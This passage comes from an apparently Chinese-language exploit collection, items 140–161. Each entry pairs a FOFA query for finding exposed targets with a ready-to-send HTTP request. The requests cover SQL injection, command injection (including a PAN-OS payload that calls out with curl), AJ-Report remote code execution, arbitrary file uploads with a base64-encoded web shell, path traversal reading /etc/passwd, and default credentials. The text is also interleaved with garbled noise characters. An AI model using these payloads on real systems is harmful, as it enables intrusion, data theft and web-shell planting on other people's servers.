3 G- ]0 O5 |5 \0 Z6 O0 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 D& h, ~, X5 Z7 B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 m. O- {; y9 @! ~4 @' U% x
Accept-Encoding: gzip, deflate, br
3 m( V" `% c. Z5 h6 d+ ?; [Connection: close
4 {' [4 j# r7 a& G6 tCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk7 v3 v+ @1 h! A6 ~1 j2 k) E
Upgrade-Insecure-Requests: 19 h' n8 o- G' j
# K" B2 C) j8 z; J' _: l
( q e+ O% U0 Q( b0 O140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入8 I3 |' b8 l" H+ H* o! \0 A5 c
CVE-2024-25664 a* o7 v x1 q+ o* \
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 ~: v: Z" F8 H+ Z% CGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
# d& D$ Q" |4 u; { wHost: x.x.x.x
& Z: ], X1 }9 o7 j3 y G4 j, kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" W. |. m! P$ H y4 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& X7 R7 G: ~0 q( k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* Y$ B3 r8 h/ X, j/ G) ]Accept-Encoding: gzip, deflate, br
! ^. }9 x. [) D6 ~Connection: close
7 s! n, q% Z, Y3 ^2 _/ n( B1 hCookie: authcode=h8g9/ _8 M0 @ a! j
Upgrade-Insecure-Requests: 1
" E9 s+ v, O- s9 o9 E5 `* g8 l* O' B1 V% z6 @+ P9 |
# d' w/ ]- L6 h141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
$ |- G0 j6 R! w% D& _, Y% HFOFA:body="指挥调度管理平台"
7 ]& G. { `, |1 h, UPOST /app/ext/ajax_users.php HTTP/1.1
, g C2 T* X& C6 ?( G% F! o! hHost: your-ip
& c' j& b- f- v8 T& t" DUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
9 O: ^. x4 i! S' M0 R# HContent-Type: application/x-www-form-urlencoded6 x! b, g# _; ]; K1 z: }8 f4 e
/ A* E* W( V# t5 J* c/ r; r' w$ T$ v
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -) h6 \* r `$ M! Y
3 v+ M, Y$ L6 x! i3 {3 \3 ~
2 @0 d2 x7 Z+ n; U. o6 C/ J142. CMSV6车辆监控平台系统中存在弱密码6 J. p0 c' V4 I4 `
CVE-2024-29666
0 K7 C0 M( ?4 a: b) c+ D3 TFOFA:body="/808gps/"
8 K4 P' `* _2 B6 U5 S+ h5 Xadmin/admin; w& n& l8 {6 e0 ~: Z
143. Netis WF2780 v2.1.40144 远程命令执行8 R" A6 C; N3 {+ }4 J/ ~
CVE-2024-258503 I! [1 n- _. {) y# ~8 {5 `
FOFA:title='AP setup' && header='netis'
8 v; Q# E. D+ S& ZPAYLOAD
, Z7 P: c9 }% |; w" q% j* r1 }5 g4 A8 H; H# ]0 B' v0 y. {
144. D-Link nas_sharing.cgi 命令注入
' I9 v1 T1 @/ d' cFOFA:app="D_Link-DNS-ShareCenter"6 k+ A# i+ s4 m6 t3 u
system参数用于传要执行的命令
E4 G! j q5 k2 Q5 UGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.11 o$ l/ @7 D9 ?7 \ h+ T2 \
Host: x.x.x.x# E" ]$ ?6 G) [
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
$ A# w+ ^# p8 b; x: {% E7 d6 B# vConnection: close0 y2 C$ p t3 T" C
Accept: */*
- O B6 t9 c" MAccept-Language: en
" W# G$ C# P! e/ }( AAccept-Encoding: gzip/ v, ]" t( {; R4 d0 [
* Y: J+ q3 g( v9 O
2 t9 J' \# u7 r! H7 a3 b145. Palo Alto Networks PAN-OS GlobalProtect 命令注入! z/ _; C4 b' \' d; D
CVE-2024-3400
2 G2 J0 x# F6 y. U) L! { RFOFA:icon_hash="-631559155"
5 ^# J' @! L" j! X( K4 {. A% ]GET /global-protect/login.esp HTTP/1.1
- O. q7 N( D9 ]7 U! j& PHost: 192.168.30.112:1005
5 E3 @: T7 }1 x, O: mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84# j' ?* ^# ^% O6 _# j' @; Z' }5 l' O
Connection: close
* U9 m5 k2 |/ a6 I6 i6 I: cCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
' Q1 D4 ?* }( i: t) K; u* }( z1 pAccept-Encoding: gzip7 o% G' R" A1 r4 O8 U
5 |" x! d k1 N; {' w
3 Q, w" z4 A9 R) }+ I. c) a) ]. o2 j* m146. MajorDoMo thumb.php 未授权远程代码执行
! _; Y, q% e1 Q2 }% bCNVD-2024-021753 g5 a% P2 {6 }& k0 d2 V
FOFA:app="MajordomoSL": \; V9 M" O/ t: o
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1" f" R$ _7 c$ a7 \
Host: x.x.x.x
% a9 D# J2 |; V6 J( B6 ?% KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
+ Z- P' v- `1 X" f, r" ?2 Q2 m& `5 Y4 rAccept-Charset: utf-8
: ?' \& }4 j$ N. e$ d' p% ?Accept-Encoding: gzip, deflate: ^4 D0 b% `/ W9 _/ `0 o
Connection: close9 I h# W Y7 j0 i4 f3 [
, L: N2 e( R/ C4 C
: ]/ q! [4 q5 m* o9 u$ C
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
+ l! E( ^+ I& ~CVE-2024-32399
8 j% `" q% p+ H8 y) I- K3 t4 YFOFA:body="RaidenMAILD"7 [7 \& o- h4 B# S) j
GET /webeditor/../../../windows/win.ini HTTP/1.18 z9 m' z' Y* i7 M& A
Host: 127.0.0.1:81
: C# X+ A ?/ c: U6 @# c; uCache-Control: max-age=0( L9 n0 g$ ]+ Z5 y5 l Q
Connection: close% U E: I' I G4 ^, u) S! Q
/ Q, T' u& {* }# d4 H! _4 {+ t$ y4 a/ e- X8 v2 y* v7 e3 V8 Z
148. CrushFTP 认证绕过模板注入3 p! \$ @4 V8 a" q
CVE-2024-4040
]+ b U, d+ m b9 x$ H: ]3 \/ qFOFA:body="CrushFTP"3 O D- G+ E9 g1 F" A5 G
PAYLOAD
, d+ L, a J! S9 }8 p3 I/ M( O6 X: e5 c8 i/ K+ l5 y
149. AJ-Report开源数据大屏存在远程命令执行
! y8 {0 ~( h' v6 g) ~9 U. QFOFA:title="AJ-Report"
: B9 r; y+ O$ ^' f; k+ [
' @9 W$ `, g- o6 e4 ?) |POST /dataSetParam/verification;swagger-ui/ HTTP/1.10 N$ h# T, |3 e% X: B& s! R
Host: x.x.x.x
& N. e c1 `1 W, f+ b; |9 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 z/ j Y2 z8 u) N) F6 I6 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ `% [+ l; l3 m& nAccept-Encoding: gzip, deflate, br
5 `+ i+ b" U0 Z: w" v5 i& e ~- YAccept-Language: zh-CN,zh;q=0.9
* c0 j2 C" Z1 C* i4 o/ @Content-Type: application/json;charset=UTF-81 N% A! R8 D; [! B# |% I
Connection: close
+ B# w% s( x: q0 z0 W) S6 y( N: ^3 q! f5 h/ E" G
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
3 D5 w1 l: u# I. ~. l" V% ]+ ]* K( w
150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 U4 t( f# L1 ]* T5 m4 [FOFA:title="AJ-Report"6 @8 ~. W: K, N: D3 u
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
# @& ?, q' f0 }2 t* b" rHost: x.x.x.x
$ H1 q5 h1 I( g: Z( B) R% NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ j4 I5 t. v% s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ }! F( E @( \4 {# f2 S
Accept-Encoding: gzip, deflate, br
0 `/ \1 s3 A5 m0 m$ f4 f1 PAccept-Language: zh-CN,zh;q=0.9
8 z4 n. j5 s+ Z/ [7 H) `! PContent-Type: application/json;charset=UTF-8
, T8 k* k0 r& j) A" z' k; ]Connection: close! [9 Y. Y* b% u4 E* i0 |
Content-Length: 339
8 Q0 n) P7 s4 z8 e% h* ~. H) @8 F* m- G# P
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}7 X8 S( M3 L; V3 Z, c- `3 w
( ?* H0 m1 j0 q, [% V7 s, G$ r) G0 |" H' B V8 q# V
151. AJ-Report 1.4.1 pageList sql注入4 i% \3 D# K- d8 G. W; X
FOFA:title="AJ-Report"
+ D' q3 ^7 ^( d7 n) ~- w' RGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
2 \" u' v$ A3 Z; `/ a0 O3 OHost: x.x.x.x; H% U! S* a; K* Y4 v0 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& ]' A% e$ E y7 [/ M# \Connection: close
; I' b7 F; ~. q6 ~: ~" WAccept-Encoding: gzip
: m6 g2 g/ C: w( z3 f
% [) B5 h4 \! ~* h" \' d
; c& Q! |6 B7 S7 P' z/ j152. Progress Kemp LoadMaster 远程命令执行0 D( ?# y9 o6 l* M
CVE-2024-1212
. o3 `2 ]+ E: y8 KLoadMaster <= 7.2.59.2 (GA)0 K; ~- r: d$ o, n0 \5 @
LoadMaster<=7.2.54.8 (LTSF)
' U% r. r6 O6 c" p5 _ O2 R1 L: f8 J3 T3 bLoadMaster <= 7.2.48.10 (LTS)
4 C" D6 A) D( G' k5 m2 n4 tFOFA:body="LoadMaster"
1 ^- V7 S- g0 m4 @* v: FJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码2 m1 ^: Y+ V, l/ S. R1 U2 Q% ?
GET /access/set?param=enableapi&value=1 HTTP/1.1* o9 {3 p4 C: v! c# l( |) y
Host: x.x.x.x
( a9 F; ?' I5 C1 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1& W: G/ G+ d8 i1 Q2 V- i
Connection: close
3 U; `9 v% n: b; U, _2 Y" HAccept: */*
' ]8 R2 E/ h1 j" @+ _2 `$ g8 gAccept-Language: en
6 y8 o6 v1 r' pAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
9 B6 e" U* I! e" eAccept-Encoding: gzip
+ P& ~1 ^" w& o4 m' T
& n, [4 t) \6 n4 |. ?
$ [- S; e0 {6 B2 S& i2 X2 L! E6 l+ V3 p% d5 S153. gradio任意文件读取% N0 n- j6 _& Z' l) h% Q8 p
CVE-2024-1561FOFA:body="__gradio_mode__"
! C: i" ?. m7 ?) P+ ^! j第一步,请求/config文件获取componets的id
0 d* e3 m4 H) j* N [& {http://x.x.x.x/config
3 v7 X! d& i" F" b H$ ], F
* e8 p0 k( t4 I: ~5 B- q, s
, b& b& r5 T, x; I- U第二步,将/etc/passwd的内容写入到一个临时文件
. G0 t+ `/ Y$ W: R6 `POST /component_server HTTP/1.1
+ n% [! ^8 l1 \) H: A( tHost: x.x.x.x
8 E" A* S, C, ^8 o- bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3* g4 @$ v3 x* e* V7 }! u
Connection: close5 h3 T0 I P- F v
Content-Length: 115
0 E5 {$ f0 `3 v1 J2 Y; g2 UContent-Type: application/json
# r0 ~+ x; X/ s3 d. o/ VAccept-Encoding: gzip" l" C0 R M8 Z
- F3 _9 i% T0 [: E& I{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
& v6 ~9 y$ @$ |4 O& Z. l" A8 |9 o! h
, ?1 p* L/ x6 s5 l9 I, l+ k$ [/ \% Y0 `/ V+ s; G6 C: x! Z' r3 W
第三步访问
; g0 ]. M3 x5 X" K4 O5 Xhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd2 Q3 \. n3 y* k0 {8 ~! Z3 T# _
1 d1 U2 r5 u/ i( C" N U! g/ j& i
154. 天维尔消防救援作战调度平台 SQL注入
8 F; X) ^* g, {- W0 zCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"+ B: l; s2 }% a( n0 f$ P* }
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
7 X' Z' _9 X9 k8 vHost: x.x.x.x- F" l" {" o, f0 U# h4 m; D4 A; I4 X
Content-Length: 106 k8 K5 z5 M; O8 ]/ T l w( f; V6 f
Cache-Control: max-age=0! O. }! r/ E3 ?. x( c
Upgrade-Insecure-Requests: 17 Z4 @- y6 R: ^' u
Origin: http://x.x.x.x
7 ^+ r I$ q( W) W( K7 jContent-Type: application/json
& [8 Z5 x, p+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
6 E7 [3 A2 Q- e4 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- |( u4 |7 ~7 DReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page3 x+ k( }' p" f, {& \6 s; N/ W
Accept-Encoding: gzip, deflate4 y2 I$ K* r1 G) ?2 M
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
# g+ }) v- b6 O: I4 l, A3 AConnection: close
0 _6 G/ q: L$ _2 I2 d( v; |! _. {
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
% T% p4 A+ p2 }" j- P. ~+ _" |7 t r3 g R' j, s4 r
! J4 Z4 c: \4 O4 x: k4 S0 w155. 六零导航页 file.php 任意文件上传" [1 [! A" O; U: ?6 b
CVE-2024-349821 B" ]- z0 ^, C
FOFA:title=="上网导航 - LyLme Spage"
' w* ~! c" a! w4 ]6 q7 J+ RPOST /include/file.php HTTP/1.1, _& u: V# o% f0 v2 }9 k
Host: x.x.x.x/ o W) T' n2 ]3 K5 r. ~7 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* f/ d4 d" Y' t$ {2 j- N0 G
Connection: close$ t( i- G) C, Q& {; r5 Y: C9 l
Content-Length: 232
3 [; b. l) M1 s1 F. s+ U- {Accept: application/json, text/javascript, */*; q=0.01
) \- Q1 k- O$ c; O: f; XAccept-Encoding: gzip, deflate, br
I- u s# x/ M& a1 }1 T" y& m5 Y3 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 }- |3 ~ ~/ ^9 O5 jContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f: b5 ^! }& K1 J& ?4 ?# f, y8 z
X-Requested-With: XMLHttpRequest
# q9 r) n/ M4 G4 Y" Q0 I" t* w: E+ V K) [3 k! @
-----------------------------qttl7vemrsold314zg0f% `# ^+ p; M! o( H+ t& M- q
Content-Disposition: form-data; name="file"; filename="test.php"* T) p. V( |3 A
Content-Type: image/png
8 s" [9 A, e: f: a4 ]2 u, @/ ^7 A% l, ]
<?php phpinfo();unlink(__FILE__);?>7 G/ r6 U# k. C. h" [( ?) n
-----------------------------qttl7vemrsold314zg0f--) e% q7 y7 N+ M6 m$ h: A3 ~
8 z) ]8 L% \( U) v
% ^; u6 S( _ v1 I
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php/ s( M! j* |$ b A
) y) Q' j" V1 }5 {. d C$ D1 W156. TBK DVR-4104/DVR-4216 操作系统命令注入1 @* B: a. U3 V3 {
CVE-2024-3721
) Z9 `8 _3 x$ |, X. l1 |5 }FOFA:"Location: /login.rsp"7 o) K5 p& W- m) m2 m' @5 s% X
·TBK DVR-4104
* N. k/ [, x1 a7 F·TBK DVR-42160 z& p t& ^* }+ o2 S a
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"% Z( z4 S+ ]3 _8 f+ v( o
0 \4 K, B4 T$ j! I; i0 w
% }1 A4 A( g6 b, U: S" ~# cPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
7 C5 c, S9 z2 H, x+ _Host: x.x.x.x, `% O. t/ o: B9 G9 s7 b* K
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 R: L7 U. V/ L" C4 [9 i& v b
Connection: close A2 |# V' l- t N! l" B9 F$ m a% R
Content-Length: 0
5 g! H8 m- ]3 nCookie: uid=1
& J( e' V3 U8 xAccept-Encoding: gzip! T5 J% @" e( u% N6 ~% c7 \
* M$ M; ^$ P A, U3 g* w4 S) ?
/ w1 o; q" D6 ^/ L) c. M0 `157. 美特CRM upload.jsp 任意文件上传
1 F0 `7 [: x& k P0 A) m9 hCNVD-2023-06971% n* l! L% v6 F; V
FOFA:body="/common/scripts/basic.js"; D0 \$ y; E9 b' v1 z3 Y
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1, G: y" \, Y- n
Host: x.x.x.x0 W) L O" @0 Y# c( N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36- q" G5 |2 x& A% e6 ~1 v3 v
Content-Length: 7092 s" ?5 H7 ^4 w& o4 t8 t0 C! L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, C+ A9 S) Y) H5 {) `Accept-Encoding: gzip, deflate
9 \- P! u- p: g( r! gAccept-Language: zh-CN,zh;q=0.9 L7 j u% k9 L0 q5 j$ x; v, c
Cache-Control: max-age=03 ?) `6 H8 {7 v$ y: n5 W
Connection: close9 t/ @7 H) s6 ]1 }9 J7 J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
9 ~! s1 f) _# b/ uUpgrade-Insecure-Requests: 1
u7 y+ y8 @" x& s: U9 {# c$ } E0 H; } Q
------WebKitFormBoundary1imovELzPsfzp5dN
$ q4 c$ V* \* w& x. t8 |8 o4 |5 tContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
3 g- B2 D7 e# ~9 MContent-Type: application/octet-stream
5 ^8 G& q) j" `2 p
' H" M" G# I9 Qnyhelxrutzwhrsvsrafb$ C, x( m( r7 R
------WebKitFormBoundary1imovELzPsfzp5dN
: P5 ?& o+ ?: n8 PContent-Disposition: form-data; name="key"0 F( ^& h0 R% P
2 q7 G* F. u+ H, R$ S8 B% E. n. Ynull
! h+ q/ w2 q$ G, n2 F3 p) k------WebKitFormBoundary1imovELzPsfzp5dN
% O+ @9 l) _1 V- I) X+ m5 yContent-Disposition: form-data; name="form"
- K) Z$ K* B& @) N6 [6 m3 p6 \9 i0 w) v9 m% m: C2 ^
null2 @, P' ^5 Z5 s% {9 ^( \2 d; }- I7 Q* v
------WebKitFormBoundary1imovELzPsfzp5dN. B8 C7 `& f+ o: ?- t# [
Content-Disposition: form-data; name="field"
6 h! Q4 K$ q0 T; T5 ~+ g/ C) p# B9 f4 m
null9 `. x, i+ l9 j5 W
------WebKitFormBoundary1imovELzPsfzp5dN
$ o |" A) V y ]9 mContent-Disposition: form-data; name="filetitile") X6 i% L* i: H& F6 ~
* [5 a9 y3 `% l8 P9 M6 R1 C# ^. s5 I- ]
null
! A n+ h' R0 H0 ~& D$ L- @------WebKitFormBoundary1imovELzPsfzp5dN$ m1 T6 I' U! |. ?6 f
Content-Disposition: form-data; name="filefolder"
6 H9 x4 V2 M. j5 [" @+ _2 V8 U6 ?
9 g9 w1 Q! s( E3 m8 I& _null8 s$ [0 s3 L0 o: b- d
------WebKitFormBoundary1imovELzPsfzp5dN--9 p' }. D H5 W ?
4 A! F9 Z4 b3 a& Z# Z1 l
8 H, P- j7 ` @+ K; y+ u6 Ihttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
6 }# f" A0 C& M* C
8 |. P+ B5 Y/ v3 k158. Mura-CMS-processAsyncObject存在SQL注入
2 \ l4 Q1 Y0 u8 { RCVE-2024-32640
( n1 T) k& D) n9 x/ f" V! V1 F/ YFOFA:"Generator: Masa CMS"
8 A3 f6 Y) u" APOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
1 r6 v7 @/ F) o3 ~2 [$ v' oHost: {{Hostname}}
3 K4 _# G5 t, [$ x9 XContent-Type: application/x-www-form-urlencoded
( o% p; }- d1 t" g# f& r; O
! J5 z# Q! q8 C4 [0 Iobject=displayregion&contenthistid=x\'&previewid=1
) j7 F3 t) j7 W& d
: ~: P* B% k. s% e+ `
% a' O1 {+ f3 ^' B159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
4 X$ W9 ^8 o: J; C7 |& QFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")' O2 t6 g" ~ \# w
POST /webservices/WebJobUpload.asmx HTTP/1.1
+ o$ F: ~: T9 L JHost: x.x.x.x
' p% \1 O5 N+ v, d: eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
0 `7 q1 K' j E* d( y7 S: G6 iContent-Length: 1080$ z3 ~4 h) ~4 O3 Q/ ~9 k2 f
Accept-Encoding: gzip, deflate
, c6 x- M8 d$ n) [9 VConnection: close7 Q N, Q7 x5 \/ B+ m/ N2 ?
Content-Type: text/xml; charset=utf-8
7 H) }% V" w2 a8 f. fSoapaction: "http://rainier/jobUpload"
3 L+ Z7 |- A! v" l& v
7 @0 [& Q7 n: p# V4 A<?xml version="1.0" encoding="utf-8"?>
- H$ y: s3 |3 c6 C6 b1 j, U n& @* V<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
H. g: Z* w! M) g7 U+ b<soap:Body>
+ E. B% S2 S, Y' l$ H2 ~<jobUpload xmlns="http://rainier">
5 L- \: h5 H, j% y4 @) {4 C$ Q<vcode>1</vcode>7 _- T0 x, B7 w6 H/ L6 L
<subFolder></subFolder>
+ A7 d" C# e" W/ i" U' f<fileName>abcrce.asmx</fileName>. f- |8 A$ ?' P$ O) v1 l
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>5 m5 m4 e: C3 ~+ i3 d% G, [
</jobUpload>4 e+ N* ?1 u* Q; h2 a7 P+ W
</soap:Body>2 S% Q6 |* b$ Y6 S' ^1 K! l8 [# z
</soap:Envelope>- I. p6 h2 V+ N' H$ X ^3 t
4 Y1 [8 E4 p) d$ t4 S
$ t% q* P! S* z- H0 N6 d7 [3 n/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")+ k" c4 R3 P! {9 U' z) H
7 S3 e9 ?% q% e. x, |5 K p& G% ` L3 ^8 s
160. Sonatype Nexus Repository 3目录遍历与文件读取
5 G4 K }' W$ `5 _CVE-2024-4956
5 q7 H; I2 I3 y" L6 e- [8 b4 u1 bFOFA:title="Nexus Repository Manager"
& ?6 Y# e3 C- c- u1 s5 fGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1& t2 q( `# A' r6 x
Host: x.x.x.x q. p: f/ X5 y
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.09 Y! G5 J9 v2 W. Y! V" M+ M( J( S+ ?
Connection: close% Z+ v* z8 T5 p o
Accept: */*0 {! n3 ]2 l% A, K
Accept-Language: en$ ~" f& E& r! K" @( e
Accept-Encoding: gzip
, K3 N3 j" J6 \) E1 i: S0 C+ j* \5 [* i( s
9 h. [9 ~! V8 g5 O! ^$ e- |- j
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 T9 B6 o# k$ Z2 M7 YFOFA:body="/KT_Css/qd_defaul.css"
# J6 u1 X! W+ g0 Z. j第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
% g" d- P# V/ V, ]5 t, i9 g" HPOST /Webservice.asmx HTTP/1.15 L& f/ v6 W* C3 b& ^
Host: x.x.x.x% R- _& }9 z& v. G8 G# }& |/ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36" ?+ z, w4 X8 D5 }* r& S6 I) t
Connection: close
: ?! ]; M7 h- Y- |$ q" k7 @Content-Length: 445
2 F) n) [5 ?" UContent-Type: text/xml9 {+ ~0 h' `- y; }. j
Accept-Encoding: gzip) r7 s7 Y: d* G+ L
$ c9 T! u0 x5 i$ x$ i<?xml version="1.0" encoding="utf-8"?>4 @/ p' S$ ^8 n* k
<soap:Envelope xmlns:xsi="
: X) D. U- M: _+ O& S0 O; ^8 Nhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"" K6 G- s( s( F5 o3 }
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
# l& \/ p9 }# {' y! u8 r<soap:Body>! k) e0 [) N ` D$ G4 G4 Z) ]% k. w9 R
<UploadResume xmlns="http://tempuri.org/">
% E9 ~2 K4 A Z! b) x<ip>1</ip>1 h( J; D2 @$ ]
<fileName>../../../../dizxdell.aspx</fileName>( W1 z: T+ o7 w% }4 p% U
